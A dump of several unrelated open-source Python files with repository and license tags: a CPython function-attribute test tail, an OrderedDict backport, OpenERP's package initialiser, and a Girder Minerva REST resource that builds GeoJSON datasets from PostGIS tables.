self.b.func_doc = "The docstring"
del self.b.func_doc
self.assertEqual(self.b.__doc__, None)
self.assertEqual(self.b.func_doc, None)
def test_main():
test_support.run_unittest(FunctionPropertiesTest, ImplicitReferencesTest,
ArbitraryFunctionAttrTest, FunctionDictsTest,
FunctionDocstringTest)
if __name__ == "__main__":
test_main()
| lgpl-2.1 |
htwenhe/DJOA | env/Lib/site-packages/openpyxl/compat/odict.py | 24 | 9421 | # Copyright (c) 2001-2011 Python Software Foundation
# 2011 Raymond Hettinger
# License: PYTHON SOFTWARE FOUNDATION LICENSE VERSION 2
# See http://www.opensource.org/licenses/Python-2.0 for full terms
# Note: backport changes by Raymond were originally distributed under MIT
# license, but since the original license for Python is more
# restrictive than MIT, code cannot be released under its terms and
# still adheres to the limitations of Python license.
# # {{{ http://code.activestate.com/recipes/576693/ (r9)
# Backport of OrderedDict() class that runs on Python 2.4, 2.5, 2.6, 2.7 and pypy.
# Passes Python2.7's test suite and incorporates all the latest updates.
try:
from thread import get_ident as _get_ident
except ImportError:
from dummy_thread import get_ident as _get_ident
try:
from _abcoll import KeysView, ValuesView, ItemsView
except ImportError:
pass
class OrderedDict(dict):
'Dictionary that remembers insertion order'
# An inherited dict maps keys to values.
# The inherited dict provides __getitem__, __len__, __contains__, and get.
# The remaining methods are order-aware.
# Big-O running times for all methods are the same as for regular dictionaries.
# The internal self.__map dictionary maps keys to links in a doubly linked list.
# The circular doubly linked list starts and ends with a sentinel element.
# The sentinel element never gets deleted (this simplifies the algorithm).
# Each link is stored as a list of length three: [PREV, NEXT, KEY].
def __init__(self, *args, **kwds):
'''Initialize an ordered dictionary. Signature is the same as for
regular dictionaries, but keyword arguments are not recommended
because their insertion order is arbitrary.
'''
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__root
except AttributeError:
self.__root = root = [] # sentinel node
root[:] = [root, root, None]
self.__map = {}
self.__update(*args, **kwds)
def __setitem__(self, key, value, dict_setitem=dict.__setitem__):
'od.__setitem__(i, y) <==> od[i]=y'
# Setting a new item creates a new link which goes at the end of the linked
# list, and the inherited dictionary is updated with the new key/value pair.
if key not in self:
root = self.__root
last = root[0]
last[1] = root[0] = self.__map[key] = [last, root, key]
dict_setitem(self, key, value)
def __delitem__(self, key, dict_delitem=dict.__delitem__):
'od.__delitem__(y) <==> del od[y]'
# Deleting an existing item uses self.__map to find the link which is
# then removed by updating the links in the predecessor and successor nodes.
dict_delitem(self, key)
link_prev, link_next, key = self.__map.pop(key)
link_prev[1] = link_next
link_next[0] = link_prev
def __iter__(self):
'od.__iter__() <==> iter(od)'
root = self.__root
curr = root[1]
while curr is not root:
yield curr[2]
curr = curr[1]
def __reversed__(self):
'od.__reversed__() <==> reversed(od)'
root = self.__root
curr = root[0]
while curr is not root:
yield curr[2]
curr = curr[0]
def clear(self):
'od.clear() -> None. Remove all items from od.'
try:
for node in self.__map.itervalues():
del node[:]
root = self.__root
root[:] = [root, root, None]
self.__map.clear()
except AttributeError:
pass
dict.clear(self)
def popitem(self, last=True):
'''od.popitem() -> (k, v), return and remove a (key, value) pair.
Pairs are returned in LIFO order if last is true or FIFO order if false.
'''
if not self:
raise KeyError('dictionary is empty')
root = self.__root
if last:
link = root[0]
link_prev = link[0]
link_prev[1] = root
root[0] = link_prev
else:
link = root[1]
link_next = link[1]
root[1] = link_next
link_next[0] = root
key = link[2]
del self.__map[key]
value = dict.pop(self, key)
return key, value
# -- the following methods do not depend on the internal structure --
def keys(self):
'od.keys() -> list of keys in od'
return list(self)
def values(self):
'od.values() -> list of values in od'
return [self[key] for key in self]
def items(self):
'od.items() -> list of (key, value) pairs in od'
return [(key, self[key]) for key in self]
def iterkeys(self):
'od.iterkeys() -> an iterator over the keys in od'
return iter(self)
def itervalues(self):
'od.itervalues -> an iterator over the values in od'
for k in self:
yield self[k]
def iteritems(self):
'od.iteritems -> an iterator over the (key, value) items in od'
for k in self:
yield (k, self[k])
def update(*args, **kwds):
'''od.update(E, **F) -> None. Update od from dict/iterable E and F.
If E is a dict instance, does: for k in E: od[k] = E[k]
If E has a .keys() method, does: for k in E.keys(): od[k] = E[k]
Or if E is an iterable of items, does: for k, v in E: od[k] = v
In either case, this is followed by: for k, v in F.items(): od[k] = v
'''
if len(args) > 2:
raise TypeError('update() takes at most 2 positional '
'arguments (%d given)' % (len(args),))
elif not args:
raise TypeError('update() takes at least 1 argument (0 given)')
self = args[0]
# Make progressively weaker assumptions about "other"
other = ()
if len(args) == 2:
other = args[1]
if isinstance(other, dict):
for key in other:
self[key] = other[key]
elif hasattr(other, 'keys'):
for key in other.keys():
self[key] = other[key]
else:
for key, value in other:
self[key] = value
for key, value in kwds.items():
self[key] = value
__update = update # let subclasses override update without breaking __init__
__marker = object()
def pop(self, key, default=__marker):
'''od.pop(k[,d]) -> v, remove specified key and return the corresponding value.
If key is not found, d is returned if given, otherwise KeyError is raised.
'''
if key in self:
result = self[key]
del self[key]
return result
if default is self.__marker:
raise KeyError(key)
return default
def setdefault(self, key, default=None):
'od.setdefault(k[,d]) -> od.get(k,d), also set od[k]=d if k not in od'
if key in self:
return self[key]
self[key] = default
return default
def __repr__(self, _repr_running={}):
'od.__repr__() <==> repr(od)'
call_key = id(self), _get_ident()
if call_key in _repr_running:
return '...'
_repr_running[call_key] = 1
try:
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, self.items())
finally:
del _repr_running[call_key]
def __reduce__(self):
'Return state information for pickling'
items = [[k, self[k]] for k in self]
inst_dict = vars(self).copy()
for k in vars(OrderedDict()):
inst_dict.pop(k, None)
if inst_dict:
return (self.__class__, (items,), inst_dict)
return self.__class__, (items,)
def copy(self):
'od.copy() -> a shallow copy of od'
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
'''OD.fromkeys(S[, v]) -> New ordered dictionary with keys from S
and values equal to v (which defaults to None).
'''
d = cls()
for key in iterable:
d[key] = value
return d
def __eq__(self, other):
'''od.__eq__(y) <==> od==y. Comparison to another OD is order-sensitive
while comparison to a regular mapping is order-insensitive.
'''
if isinstance(other, OrderedDict):
return len(self) == len(other) and self.items() == other.items()
return dict.__eq__(self, other)
def __ne__(self, other):
return not self == other
# -- the following methods are only used in Python 2.7 --
def viewkeys(self):
"od.viewkeys() -> a set-like object providing a view on od's keys"
return KeysView(self)
def viewvalues(self):
"od.viewvalues() -> an object providing a view on od's values"
return ValuesView(self)
def viewitems(self):
"od.viewitems() -> a set-like object providing a view on od's items"
return ItemsView(self)
# # end of http://code.activestate.com/recipes/576693/ }}}
| mit |
rubencabrera/odoo | openerp/__init__.py | 235 | 3586 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
""" OpenERP core library."""
#----------------------------------------------------------
# Running mode flags (gevent, prefork)
#----------------------------------------------------------
# Is the server running with gevent.
import sys
evented = False
if sys.modules.get("gevent") is not None:
evented = True
# Is the server running in pefork mode (e.g. behind Gunicorn).
# If this is True, the processes have to communicate some events,
# e.g. database update or cache invalidation. Each process has also
# its own copy of the data structure and we don't need to care about
# locks between threads.
multi_process = False
#----------------------------------------------------------
# libc UTC hack
#----------------------------------------------------------
# Make sure the OpenERP server runs in UTC. This is especially necessary
# under Windows as under Linux it seems the real import of time is
# sufficiently deferred so that setting the TZ environment variable
# in openerp.cli.server was working.
import os
os.environ['TZ'] = 'UTC' # Set the timezone...
import time # ... *then* import time.
del os
del time
#----------------------------------------------------------
# Shortcuts
#----------------------------------------------------------
# The hard-coded super-user id (a.k.a. administrator, or root user).
SUPERUSER_ID = 1
def registry(database_name=None):
"""
Return the model registry for the given database, or the database mentioned
on the current thread. If the registry does not exist yet, it is created on
the fly.
"""
if database_name is None:
import threading
database_name = threading.currentThread().dbname
return modules.registry.RegistryManager.get(database_name)
#----------------------------------------------------------
# Imports
#----------------------------------------------------------
import addons
import conf
import loglevels
import modules
import netsvc
import osv
import pooler
import release
import report
import service
import sql_db
import tools
import workflow
#----------------------------------------------------------
# Model classes, fields, api decorators, and translations
#----------------------------------------------------------
from . import models
from . import fields
from . import api
from openerp.tools.translate import _
#----------------------------------------------------------
# Other imports, which may require stuff from above
#----------------------------------------------------------
import cli
import http
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
Kitware/minerva | server/rest/postgres_geojson.py | 1 | 15834 | import hashlib
import json
from girder.api import access
from girder.api.describe import describeRoute, Description
from girder.api.rest import Resource, ValidationException, loadmodel
from girder.utility import assetstore_utilities, progress
from girder.plugins.minerva.rest.geojson_dataset import GeojsonDataset
from girder.plugins.minerva.utility.minerva_utility import findDatasetFolder
from .dataset import Dataset
class PostgresGeojson(Resource):
def __init__(self):
super(PostgresGeojson, self).__init__()
self.resourceName = 'minerva_postgres_geojson'
self.route('GET', ('assetstores', ), self.getAssetstores)
self.route('GET', ('tables', ), self.getTables)
self.route('GET', ('columns', ), self.getColumns)
self.route('GET', ('values', ), self.getValues)
self.route('GET', ('all_values', ), self.getAllValues)
self.route('POST', (), self.createPostgresGeojsonDataset)
self.route('GET', ('result_metadata',), self.resultMetadata)
self.route('GET', ('geometrylink', ), self.getGeometryLinkTarget)
self.route('GET', ('geometrylinkfields', ), self.geometryLinkField)
def _getQueryParams(self, schema, table, fields, group, filters,
output_format):
return {
'tables': [{'name': '{}.{}'.format(schema, table),
'table': table,
'schema': schema}],
'fields': fields,
'group': group,
'filters': filters,
'limit': -1,
# This will potentially save database computing resource
'clientid': str(self.getCurrentUser()['_id']),
'format': output_format
}
@access.user
@describeRoute(
Description('Returns list of eligible assetstores')
)
def getAssetstores(self, params):
return list(self.model('assetstore').find(
query={
'type': 'database',
'database.dbtype': 'sqlalchemy_postgres'
},
fields=['_id', 'name']))
@access.user
@loadmodel(model='assetstore', map={'assetstoreId': 'assetstore'})
@describeRoute(
Description('Returns list of tables from a database assetstore')
.param('assetstoreId', 'assetstore ID of the target database')
)
def getTables(self, assetstore, params):
adapter = assetstore_utilities.getAssetstoreAdapter(assetstore)
tables = adapter.getTableList()
# tables is an array of databases, each of which has tables. We
# probably want to change this to not just use the first database.
return [table['name'] for table in tables[0]['tables']]
@access.user
@loadmodel(model='assetstore', map={'assetstoreId': 'assetstore'})
@describeRoute(
Description('Returns list of columns for a given table')
.param('assetstoreId', 'assetstore ID of the target database')
.param('table', 'Table name from the database')
)
def getColumns(self, assetstore, params):
return self._getColumns(assetstore, params)
def _getColumns(self, assetstore, params):
adapter = assetstore_utilities.getAssetstoreAdapter(assetstore)
conn = adapter.getDBConnectorForTable(params['table'])
fields = conn.getFieldInfo()
return fields
@access.user
@loadmodel(model='assetstore', map={'assetstoreId': 'assetstore'})
@describeRoute(
Description('Returns distinct values for a column')
.param('assetstoreId', 'assetstore ID of the target database')
.param('table', 'Table name from the database')
.param('column', 'Column name from a table')
)
def getValues(self, assetstore, params):
return self._getValues(assetstore, params)
def _getValues(self, assetstore, params):
filter = params.get('filter')
adapter = assetstore_utilities.getAssetstoreAdapter(assetstore)
conn = adapter.getDBConnectorForTable(params['table'])
queryParams = {
'fields': [{
'func': 'distinct',
'param': [{'field': params['column']}],
'reference': 'value',
}],
'filters': filter,
'limit': 200,
'format': 'rawdict'}
result = list(adapter.queryDatabase(conn, queryParams)[0]())
return [row['value'] for row in result]
@access.user
@loadmodel(model='assetstore', map={'assetstoreId': 'assetstore'})
@describeRoute(
Description('Returns all distinct values for all columns for a given table')
.param('assetstoreId', 'assetstore ID of the target database')
.param('table', 'Table name from the database')
)
def getAllValues(self, assetstore, params):
resp = {}
for i in self._getColumns(assetstore, params):
if i['name'] != 'geom' and i['datatype'] != 'number':
resp[i['name']] = self._getValues(assetstore, {
'column': i['name'],
'table': params['table']})
return resp
@access.user
@loadmodel(model='assetstore', map={'assetstoreId': 'assetstore'})
@describeRoute(
Description('Create json dataset for the given view/table filtering values')
.param('assetstoreId', 'assetstore ID of the target database')
.param('table', 'Table name from the database')
.param('field', 'Field to which the aggregate function will be applied')
.param('aggregationFunction', 'aggregate function used on the field')
.param('filter', 'Filter condition object for filtering table data')
.param('geometryField', 'Geometry data definition object')
.param('datasetName', 'A custom name for the dataset', required=False)
)
def createPostgresGeojsonDataset(self, assetstore, params):
filter = params['filter']
table = params['table']
field = params['field']
aggregateFunction = params['aggregateFunction']
geometryField = json.loads(params['geometryField'])
if geometryField['type'] == 'built-in':
buildInGeomField = geometryField['field']
properties = [field, {
'func': aggregateFunction,
'param': {'field': field}
}]
# add string fields with concat aggregate function and in the format for
# json_build_object
for i in self._getColumns(assetstore, {'table': params['table']}):
if i['datatype'] == 'string' and i['name'] != field:
properties.extend((i['name'], {
'func': 'string_agg',
'param': [{
'func': 'distinct',
'param': {'field': i['name']}
}, '|'],
'reference': i['name']
}))
fields = [{
'func': 'json_build_object', 'param': [
'type', 'Feature',
'geometry', {
'func': 'cast', 'param': [{
'func': 'st_asgeojson', 'param': [{
'func': 'st_transform', 'param': [{'field': buildInGeomField}, 4326]
}]}, 'JSON']
},
'properties', {
'func': 'json_build_object', 'param': properties
}
]
}]
group = [buildInGeomField]
elif geometryField['type'] == 'link':
fields = [{
'func': aggregateFunction,
'param': {'field': field},
'reference': field
}]
group = [x['value'] for x in geometryField['links']]
# add string fields with concat aggregate function
for i in self._getColumns(assetstore, {'table': params['table']}):
if i['datatype'] in ('string', 'number', 'date') and i['name'] != field:
if i['datatype'] == 'string':
fields.append({
'func': 'string_agg',
'param': [{
'func': 'distinct',
'param': {'field': i['name']}
}, '|'],
'reference': i['name']
})
datasetName = params['datasetName']
# TODO: schema should be read from the listed table, not set explicitly
schema = 'public'
hash = hashlib.md5(filter).hexdigest()
if datasetName:
output_name = datasetName
else:
output_name = '{0}.{1}.{2}.geojson'.format(
table, field, hash[-6:])
currentUser = self.getCurrentUser()
datasetFolder = findDatasetFolder(currentUser, currentUser)
adapter = assetstore_utilities.getAssetstoreAdapter(assetstore)
# Create the item
dbParams = self._getQueryParams(
schema, table, fields, group, filter,
'GeoJSON' if geometryField['type'] == 'built-in' else 'json')
dbParams['tables'][0]['name'] = output_name
result = adapter.importData(datasetFolder, 'folder', dbParams,
progress.noProgress, currentUser)
resItem = result[0]['item']
GeojsonDataset().createGeojsonDataset(
itemId=resItem['_id'],
postgresGeojson={
'geometryField': geometryField,
'field': field,
'aggregateFunction': aggregateFunction
}, params={})
return resItem['_id']
@access.user
@loadmodel(model='assetstore', map={'assetstoreId': 'assetstore'})
@describeRoute(
Description('Query metadata of result')
.param('assetstoreId', 'assetstore ID of the target database')
.param('table', 'Table name from the database')
.param('field', 'Field to which the aggregate function will be applied')
.param('aggregationFunction', 'aggregate function used on the field')
.param('filter', 'Filter condition object for filtering table data')
.param('geometryField', 'Geometry data definition object')
)
def resultMetadata(self, assetstore, params):
filter = params['filter']
table = params['table']
field = params['field']
geometryField = json.loads(params['geometryField'])
adapter = assetstore_utilities.getAssetstoreAdapter(assetstore)
conn = adapter.getDBConnectorForTable(table)
# Get total record count in table
query = adapter.queryDatabase(conn, self._getQueryParams(
'public', table, [{
'func': 'count',
'param': {'field': field},
'reference': 'count'
}], None, None, 'rawdict'))
recordCountInTable = list(query[0]())[0]['count']
# Get record count after filter
if filter:
query = adapter.queryDatabase(conn, self._getQueryParams(
'public', table, [{
'func': 'count',
'param': {'field': field},
'reference': 'count'
}], None, filter, 'rawdict'))
recordCountAfterFilter = list(query[0]())[0]['count']
else:
recordCountAfterFilter = recordCountInTable
# Get record count after aggregation
if geometryField['type'] == 'built-in':
field = {'field': geometryField['field']}
query = adapter.queryDatabase(conn, self._getQueryParams(
'public', table, [{
'func': 'count',
'param': {
'func': 'distinct',
'param': field,
},
'reference': 'count'
}], None, filter, 'rawdict'))
elif geometryField['type'] == 'link':
fields = [{'field': x['value']} for x in geometryField['links']]
query = adapter.queryDatabase(conn, self._getQueryParams(
'public', table, [{
'func': 'count',
'param': {
'func': 'distinct',
'param': {
'func': 'concat',
'param': fields,
},
},
'reference': 'count'
}], None, filter, 'rawdict'))
recordCountAfterAggregation = list(query[0]())[0]['count']
# Get record count after geometry
linkingDuplicateCount = None
if geometryField['type'] == 'built-in':
recordCountAfterGeometryLinking = None
recordCount = recordCountAfterAggregation
elif geometryField['type'] == 'link':
fields = [x['value'] for x in geometryField['links']]
group = [x['value'] for x in geometryField['links']]
schema = 'public'
dbParams = self._getQueryParams(
schema, table, fields, group, filter, 'rawdict')
query = adapter.queryDatabase(conn, dbParams)
records = list(query[0]())
dataset = Dataset()
assembled, linkingDuplicateCount = dataset.linkAndAssembleGeometry(
geometryField['links'], geometryField['itemId'], records)
recordCountAfterGeometryLinking = len(assembled.features)
recordCount = recordCountAfterGeometryLinking
return {
'recordCountInTable': recordCountInTable,
'recordCountAfterFilter': recordCountAfterFilter,
'recordCountAfterAggregation': recordCountAfterAggregation,
'recordCountAfterGeometryLinking': recordCountAfterGeometryLinking,
'linkingDuplicate': linkingDuplicateCount,
'recordCount': recordCount
}
@access.user
@describeRoute(
Description('Create dataset json for the given view/table filtering values')
.param('table', 'Table name from the database')
.param('field', 'Field that will be used as default value of fill color')
.param('aggregationFunction', 'aggregate function to use on the value field')
.param('filter', 'Filter generated by the user')
.param('geometryField', 'Geometry link parameter object')
.param('datasetName', 'A custom name for the dataset', required=False)
)
@access.user
@describeRoute(
Description("Get dataset of current user as geometry link targets")
)
def getGeometryLinkTarget(self, params):
currentUser = self.getCurrentUser()
folder = findDatasetFolder(currentUser, currentUser)
items = list(self.model('item').find(
query={'folderId': folder['_id'],
'meta.minerva.dataset_type': 'geojson'},
fields=['name']))
return items
@access.user
@describeRoute(
Description("Get keys of GeoJSON feature properties of a dataset")
.param('itemId', 'Item id', required=True)
)
def geometryLinkField(self, params):
currentUser = self.getCurrentUser()
itemId = params['itemId']
item = self.model('item').load(itemId, user=currentUser)
featureCollections = Dataset().downloadDataset(item)
if 'features' not in featureCollections or \
len(featureCollections['features']) == 0 or \
'properties' not in featureCollections['features'][0]:
raise ValidationException('invalid geojson file')
return featureCollections['features'][0]['properties'].keys()
| apache-2.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.